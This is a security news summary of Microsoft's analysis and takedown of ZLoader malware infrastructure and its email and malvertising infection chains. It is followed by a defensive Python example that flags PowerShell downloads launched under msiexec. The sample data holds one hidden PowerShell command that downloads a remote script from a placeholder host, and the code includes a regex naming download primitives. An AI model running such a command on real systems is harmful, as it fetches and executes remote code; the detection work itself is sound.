Microsoft Analyzes & Disrupts Zloader
Microsoft's efforts with telecommunications providers have enabled the takedown of various ZLoader infrastructure. Microsoft has also provided intelligence on the attack chains associated with ZLoader, each using a different technique to deliver the ZLoader payload. The first attack chain delivers the payload through an email containing a malicious link or attachment that downloads ZLoader. A second attack chain leverages Google Ads, popular advertising software tools, and compromised legitimate domains to stage malicious content on subdomains; a malicious MSI downloaded and executed by the victim then triggers PowerShell and scripts that download the ZLoader payload. Once the ZLoader payload has been dropped by either chain, the modular malware typically creates persistence, downloads additional payloads, or initiates enumeration to fulfill the attacker's objectives.
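One way a defender can surface the MSI-to-PowerShell download step of the second chain in endpoint process telemetry is to look for PowerShell with a download-style command line running under an msiexec.exe ancestor. This is an added example, not code or data from the Microsoft report; the events are constructed Sysmon-style process-creation records and the domain is a placeholder.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    # One process-creation record (constructed, Sysmon Event ID 1-like fields).
    pid: int
    ppid: int
    image: str
    cmdline: str

# Command-line fragments that indicate PowerShell is fetching remote content.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|https?://", re.IGNORECASE)

def ancestors(ev, by_pid, max_depth=4):
    """Yield ev's parent chain, nearest first; bounded, and stops when a PID is unknown."""
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return
        yield cur

def find_msi_powershell_downloads(events):
    """Return (powershell_pid, msiexec_pid) pairs where a PowerShell process with a
    download-style command line has msiexec.exe among its recent ancestors."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.image.lower() != "powershell.exe" or not DOWNLOAD_RE.search(ev.cmdline):
            continue
        for anc in ancestors(ev, by_pid):
            if anc.image.lower() == "msiexec.exe":
                hits.append((ev.pid, anc.pid))
                break
    return hits

# Constructed sample: a benign installer, a benign admin PowerShell session, and one
# msiexec -> cmd -> powershell chain that pulls a remote script (placeholder host).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "msiexec.exe", 'msiexec.exe /i "C:\\Users\\u\\Downloads\\setup.msi" /qn'),
    ProcEvent(210, 200, "cmd.exe", "cmd.exe /c start.bat"),
    ProcEvent(220, 210, "powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://updates.example.invalid/s.ps1')\""),
    ProcEvent(300, 100, "powershell.exe", "powershell.exe Get-Service"),
    ProcEvent(400, 100, "msiexec.exe", 'msiexec.exe /i "C:\\Temp\\tool.msi"'),
]
```

Running `find_msi_powershell_downloads(SAMPLE_EVENTS)` flags only the chained process (PID 220) against its msiexec ancestor (PID 200); the plain installer and the interactive PowerShell are not reported.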